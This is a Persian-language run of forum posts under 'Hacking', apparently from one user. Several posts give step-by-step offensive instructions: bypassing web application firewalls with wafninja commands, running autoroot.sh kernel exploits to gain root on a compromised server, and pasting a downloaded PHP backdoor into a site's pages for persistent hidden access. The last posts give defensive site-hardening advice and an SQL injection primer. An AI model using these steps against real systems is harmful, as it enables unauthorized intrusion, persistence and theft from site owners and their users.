    که یکی ازین ابزار ها که ابزار فوق العاده جالب و کاربردی هم هست ابزار Fsociety نام دارد قسمت های مختلف ابزار رو براتون شرح خواهم داد : Information Gathering Password Attacks Wireless Testing Exploitation Tools Sniffing & Spoofing Web Hacking Private Web Hacking Post Exploitation Contributors Install & Update لینک دریافت GitHub - Manisso/fsociety: fsociety Hacking Tools Pack – A Penetration Testing Framework
  19. Rednofozi

    Hacking

    در این اموزش نحوه دور زدن فایروال های وب اپلیکشن با ابزار بسیار قوی توضیح خواهیم داد پشتیبانی از متد های مختلفی همچون POST GET HTTP Cookies proxy خیلی وقت ها در حمله های مختلف مانند XSS و SQLi فایروال یا WAF جلوی اجرای املات را میگیرد اما راه های دور زدن به صورت دستی صورت میگیرد اگر به نتیجه ای نرسید استفاده از ابزار ها و تست ان ها نیاز است ابزاری که در اخر این اموزش قرار داده شده این کار را به راحتی انجام میدهد دستور اجرای ابزار wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} … مثال اجرای ابزار برای ورودی سایت اسیب پذیر python wafninja.py fuzz -u “http://www.target.com/page.php?id=FUZZ” -c “phpsessid=value” -t xss -o output.htm برای دور زدن WAG در حملات XSS python wafninja.py bypass -u “http://www.target.com/page.php” -p “Name=PAYLOAD&Submit=Submit” -c “phpsessid=value” -t xss -o output.htm امکانات فوق العاده بیشتر و عالی تر هم در این ابزار وجود داره که باید علاقه مندان با تست و عملیات های تست نفوذ ان ها را تست نمایند
  20. Rednofozi

    Hacking

    یکی از اصلی ترین و مهم ترین مباحث هک و امنیت برسی وب سایت میباشد که یکی از قسمت های اصلی وب سایت ها اپلودر ان ها هستند این اپلودر ها با هدف خاصی طراحی میشوند به طور مثال انتخاب تصویر برای کاربر عضو یا ارسال تیکت و …. به همین دلیل در بیشتر وب سایت ها این اپلودر هارا مشاهده میکنیم به همین دلیل بسیاری از برنامه نویس ها خطا های بسیاری را دارند و با مشکلات امنیتی رو به رو میشوند و به طور کلی برنامه نویسان بعضی ار پسوند های فایل های مهم را غیر قابل اپلود میکنند و تصور میکنند امن شده است ولی در واقعیت راه های دور زدن باز است در ادامه با راه های دور زدن ان اشنا میشویم
  21. Rednofozi

    Hacking

    از نفوذ به یک وبسایت هدف بعدی و هدف اصلی بالا بردن سطح دسترسی در سرور میباشد با بالا بردن سطح دسترسی در سرور میتوان سایت های دیگر ان سرور را دسترسی گرفت خیلی وقت ها ممکن است از سایت هدف نشود باگی پیدا کرد پس هدف سرور ان سایت میشود مثلا در یک سرور ۱۰۰۰ سایت وجود دارد از این هزار سایت یکی از ان ها راه نفوذی پیدا میشود که با استفاده از ان سطح دسترسی خود را بالا برده و وبسایت هدف را مورد حمله قرار میدهیم در قسمت کنسول دسترسی از وبسایت هک شده دستور زیر را بزنید و ببینید دسترسی در حال حاضر شما چه نوعی است id بعد از مطمئن شدن از دسترسی سطح پایین از لینک پایین صفحه ابزار را دانلود کنید ابزار با زبان bash نوشته شده است و در لینوکس قابل اجرا است و همچنین سیستم های مک وانواع توزیع لینوکس ان را در سرور خود دانلود کنید و در قسمت کنسول ان را اجرا کنید ./autoroot.sh قبل از هرچیز ورژن کرنل خود را در بیاورید با دستور زیر uname -a و بعد از فهمیدن ورژن اتو روت را به صورت زیر اجرا کنید 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 for kernel version 2.6 all autoroot.sh 2 for kernel version 3 all autoroot.sh 3 for kernel version 4 all autoroot.sh 4 for freebsd & openbsd all autoroot.sh bsd for apple macos all autoroot.sh app for kernel 2.6,3,4 bsd & app all bash autoroot.sh all روت شدن به سرور ورژن کرنل را هنگام اجرا وارد کنید در غیر این صورت اکسپلویت تمامی ورژن ها تست میشود و مان بیشتری خواهد برد بعد از اتمام کار اگر به سرور روت شده باشید میتوانید روت کیت یا بکدور خود را اجرا کنید در قسمت های بعدی اموزش نصب روت کیت و بکدور سرور اموزش داده خواهد شد
  22. Rednofozi

    Hacking

    کدور (back door) به معنای درب پشتی است اما در مباحث هک و امنیت برای نگه داری دسترسی بعد از نفوذ و هک میباشد هکر بعد از نفوذ به یک سایت و سرور نیاز دارد تا بعد از مشخص شدن هک شدن وب سایت دسترسی خود را نگه دارد که روش های مختلفی برای این کار وجود دارد به طور مثال میتواند بکدور را در قسمت های مختلفی بگذارد مانند : فایل های درون سرور دیتابیس سایت سرویس های سرور ایجاد سرویس جدید برای اتصال بکدور هایی که در فایل ها گزاشته میشوند اصولا شامل یک اپلودر هستند که بعد ها بتوانند شل اسکریپت خود را مجدد اپلود کنند بکدور های دیتابیس هم بصورت درب پشتی های فایل میباشند با این تفاوت که از دیتابیس اجرا میشود درب پشتی های سرور ها معمولا با استفاده از ابزار های خاص امکان پذیر است که قابلیت ورود از یک سرویس را ایجاد میکنند که میتوانند شکل های متفاوتی داشته باشند روش دیگری که برای اتصال به سرور در نظر گرفته میشود استفاده از روش هایی برای باز کردن سرویس جدید در سرور است تست نفوذ به شبکه های وای فای با Hijacker در اندروید به طور مثال با ابزار نت کت این کار انجام میشود و مجدد به سرور متصل میشوند ایجاد درب پشتی به چه صورت انجام میشود ؟ تیم هسته تست نفوذ (anonysec team ابزازی برای این کار برای شما به صورت رایگان اماده کرده است که می توانید با استفاده از ان بکدور را در فایل های درون سرور ایجاد کنید و این ابزار فقط برای سایت های طراحی شده به زبان PHP قابل استفاده است در ابتدا برای استفاده از این ابزار از لینک اخر همین اموزش فایل را دانلود کنید حال یک فایل از صفحات php را در سایت انتخاب کنید یعنی فایل انتخاب شده اخر ان .php باشد ما برای مثال یک صفحه را به دلخواه انتخاب میکنیم و وارد سورس صفحه انتخاب شده میشویم و حالا کد های درون فایل دانلود شده را در ابتدا فایل انتخاب شده در سرور بگزارید و ان را ذخیره کنید درب پشتی ایجاد شده و کافیست وارد ان شوید برای ورود به ان باید ادرس فایل را در مرورگر وارد کرد که هیچ تغیری را در ان احساس نمیکنید و با اضافه کردن ادرس زیر در ادامه ادرس بکدور قابل مشاهده میشود pentestcore=core? ادرس باید مانند ادرس زیر باشد http://site.com/page.php?pentestcore=core در نهایت چیزی که مشاهده میشود به شرح زیر خواهد بود نکته : همچنین میتوانید داخل سورس بکدور کلمه core در خط دوم را به کلمه دلخواه برای ورود به درب پشتی تغیر دهید امنیت برای امنیت در مقابل بکدور ها میتوانید از اسکنر های بکدور استفاده کنید یا در صورت دسترسی از انتی ویروس ها و انتی شلر ها برای استفاده کنید
  23. Rednofozi

    Hacking

    ابزار Pure Blood یکی از برنامه هایی محبوب برای پنتستر ها است که ورژن ۲ ان منتشر شد است و در این نسخه شاهد امکانات فوق العاده ای در این ابزار هستیم به دلیل نوشته شدن ان به زبان پایتون این امکان وجود دارد که در هر سیستم عاملی که پایتون نصب شود ابزار قابل اجرا باشد و این مزیت ان است که در سیستم عامل های ویندوز , لینوکس و مک قابل اجرا و استفاده است همچنین این ابزار برای انجام هرچه بهتر عملکرد خود از چندین ابزار دیگر استفاده میکند و در واقع مکملی از ابزار ها است امکانات هویز جستجو صفحات ادمین اسکن امنیتی وب سایت امکان اسکن با wpscan بروت فورس وردپرس دامپ دیتابیس درحملات SQLi تبدیل متن به هش تشخیص سیستم مدیریت محتوا استخراج پسورد …. بایپس Firewall وب اپلیکشن اموزش نصب و استفاده در لینوکس بعد از دریافت کامل ابزار وارد پوشه دانلود شده شوید cd pureblood قبل از اجرا برای نصب پیشنیاز های ابزار دستور زیر را وارد کنید pip install -r requirements.txt برای اجرای ابزار هم از دستور زیر استفاده کنید python pureblood.py این ابزار به صورت زنده قابل استفاده است و نیازی به سویچ ندارد نکته : دقت داشته باشید این ابزار با پایتون نسخه ۳ نوشته شده است و باید با همان نسخه اجرا شود پس قبل اجرا پایتون ورژن ۳ نصب نمایید
  24. Rednofozi

    Hacking

    مهمترین عامل افزایش امنیت وب سایت در بروز رسانی همیشگی، رعایت اصول امنیتی میباشد که یک وب سایت با اشتباهات بسیار ساده در کمترین زمان ممکن توسط هکرهای مبتدی نیز هک خواهد شد. خیلی از کاربران همیشه سوالاتی مبنی بر اینکه علت هک شدن سایت آیا به سرور مربوط هست؟ مشکل فایروال دارید و امثال آن؟ در این مقاله قصد داریم علت اصلی هک سایتها را که عمده مشکل امنیتی آن عدم بروز رسانی و یا باگ نرم افزاری هست را شرح دهیم. عواملی که باعث هک سایت من میشود چیست؟ عدم بروز رسانی نرم افزار سایت همیشه در تمامی نرم افزار ها و سیستم عامل ها بعد از ارائه نسخه اولیه، نسخه هایی تحت عنوان نسخه های آپدیت ارائه میگردد که حتی گاها نسخه های آپدیتی به اندازه ای تغییر میکنند که همانند سیستم جدید عمل میکند. در سیستم های طراحی سایت عمومی هنگامی که یک باگ مطرح میگردد، ارائه دهنده سیستم مدیریت محتوای مد نظر شما پچ هایی را جهت بروز رسانی نرم افزار سایت شما ارائه میدهند، که بایستی در اولین فرصت نرم افزار سایت خود را بروز رسانی کنید. دقت داشته باشید که در صورت عدم بروز رسانی نرم افزار سایت، با توجه به عمومی شدن باگ و مشکلات امنیتی، ریسک هک سایت شما به مقدار بسیار زیادی بالا خواهد رفت. پس در صورتی که علاقه مند هستید سایت شما بدون هیچ مشکلی همیشه در حال سرویس دهی باشد، این مورد را جدی گرفته و از برروز رسانی های ارائه شده سیستم مدیریت محتوای سایت خود مطلع باشید. استفاده از اسکریپت های نال شده پیشتر مقالاتی در در مورد مشکلات ناشی از پلاگین های نال شده داشتیم. این مورد را همیشه مد نظر داشته باشید که حتی اگر اسکریپتی که شما نال شده ی آنرا استفاده میکنید هیچگونه باگ و Backdoor نداشته باشد بازهم شما در خطر هک شدن هستید. اسکریپنی که پایه آن نال و کرک شدن باشد، مطمئنا امکان آپدیت را نخواهد داشت. شما در ارائه آپدیت همه Critical نرم افزار سایت خود دو دل خواهید شد که آپدیت کنید یا خیر؟ اگر آپدیت نکنید ریسک امنیتی بسیار بالایی خواهید داشت، در صورتی که آپدیت کنید وجود باگ های کرکر، یا Backdoor های آنها همیشه شما را نگران خواهد نمود. استفاده از رمز عبور ضعیف و غیر امن شما برای تهیه قفل منزل خود از قفل های بسیار ساده و شکننده استفاده میکنید؟ تمامی کلید های منزل محل کار، پارکینگ و … خود را یکسان میکنید؟ مطمئنا جواب شما خیر میباشد. همان اندازه ای که منزل شما و قفل درب آن برایتان مهم هست پسورد را جدی بگیرید. اکثر هک های ساده و مبتدی معمولا از این نوع میباشند. هکر مبتدی با داشتن لیستی از پسورد های عمومی که اکثر کاربران از آن استفاده میکنند، براحتی کلید وب سایت شما را خواهند یافت. به عنوان مثال پسوردهایی که همیشه مشکلات امنیتی دارند: شماره شناسنامه، تاریخ تولد، سال تولد، رمز های بسیار استفاده شده و دیکشنری وار( در مورد این موارد پیشتر مقاله ای با عنوان حملات بروت فورس منتشر کرده بودیم که در صورت تمایل پیشنهاد میگردد حتما مطالعه کنید) . نصب پلاگین ، ماژل، قالب کرک شده اسکریپت نال شده یا پلاگین، ماژول و … کرک شده هیچ تفاوتی با هم ندارند. بسیاری از کاربران خود را این طور گول میزنند که این فقط یک پلاگین هست، این فقط یک قالب هست مگر یک قالب چه دسترسی هایی دارد؟ امکان نفوذ به هسته نرم افزار سایت و یا سرور از طریق قالب به هیچ عنوان وجود ندارد!!! این باورها میتوانید شما را به دام هکرها انداخته و زحمات شما را نابود کنند. استفاده از پلاگین، اسکریپت دارای باگ امنیتی بسیاری از پلاگین ها یا اسکریپت ها نال شده نمیباشند ولی دارای مشکلات امنیتی هستند. البته بسیاری از این مشکلات امنیتی را خود توسعه دهندگان نیز مطلع نیستند و عمومی گزارش نشده است ولی تست امنیتی نیز به احتمال زیاد روی آنها انجام نگرفته است. همیشه قبل از نصب و استفاده از هر اسکریپتی ابتدا با صبوری بسیار بالا نسبت به بررسی کلیه مشکلات امنیتی اسکریپت، تاریخ های بروز رسانی، وجود تیم توسعه دهنده آن، وجود انجمن کامنیوتی آن اقدام کنید. هر اسکریپت بدون کامنیوتی بالا و تیم توسعه دهنده با پشتکار بالا محکوم به هک میباشد. عدم رعایت استانداردهای امنیتی نرم افزار بسیاری از نرم افزارها و CMS رایج ، موارد امنیتی را بصورت دلخواه به کاربران خود اعلام میکنند که معمولا توسط بسیاری از کاربران نادیده گرفته میشود. به عنوان مثال در بسیاری از سیستم های مدیریت محتوا تغییر پوشه ادمین را همیشه پیشنهاد میدهند. یا استفاده از پسورد بسیار قوی را در کنار نام کاربر مدیر اصلی غیر از admin پیشنهاد میدهند. با جدی گرفتن این استانداردهای حتی Optional براحتی میتوانید امنیت سایت خود را افزایش دهید. مثلا یکی از موارد بسیار مهم و حیاتی: برای پوشه ادمین سایت خود از Password Protection هاست خود استفاده کنید و نام پیش فرض آن را تغییر دهید.( در مقاله بروت فورس در مورد این تغییرات و محدود سازی بخش ادمین مطالب جالبی عنوان شده است که در صورت تمایل پیشنهاد میگردد حتما مطالعه کنید.) عدم آشنایی به پرمیشن های صحیح و امن در سیستم های مدیریت محتوا بسیاری از هک های ساده توسط اشتباهات رایج انجام میگیرد. کاربر مبتدی بدون مطالعه در مورد کاری که انجام میدهد باعث میشود هکر بتواند براحتی نفوذ کند. به عنوان مثال: پرمیشن 777 به فولدری میدهد بدون اینکه بداند پرمیشن 777 چیست و با تنظیم آن مخربها چه دسترسی میتوانند داشته باشند. پرمیشن بندی اسکریپت سایت خود را همانند راهنما ها و توصیه های امینتی تیم توسعه CMS خود تنظیم کنید و هیچ پرمیشن اضافی به فایل یا پوشه ندهید. به اشتراک گذاری پسوردها نکته آخر و بسیار مهم جهت جلوگیری از نفوذ هکر ها عدم به اشتراک گذاری پسورد میباشد، پسورد مدیریت سایت خود را به هیچ عنوان در هیچ سایت، کامپیوتر و …. به اشتراک نگذارید. اشتراک پسورد همانند این میباشد که یک کپی از کلید منزل خود را تقدیم همه میکنید. امید است با رعایت این 8 نکته بتوانید امنیت سایت خود را تا حد ممکن افزایش دهید و جلوی هکرهای مبتدی را بگیرید تا آسیب جدی برای سایت شما نداشته باشند.
  25. یکی از راه های حمله و نفوذ به سایت های اینترنتی و دستکاری داده های بانک اطلاعاتی،تزریق کد های مخرب SQL به سایت است. در این روش مهاجم سعی می کند با وارد کردن دستورات sql در سایت به پایگاه داده دسترسی پیدا کرده و اقدام به ویرایش ،حذف و بازیابی داده های مورد نظر خود از بانک اطلاعاتی کند. در این مقاله به چگونگی مقابله با این حمله به صورت اجمالی می پردازیم.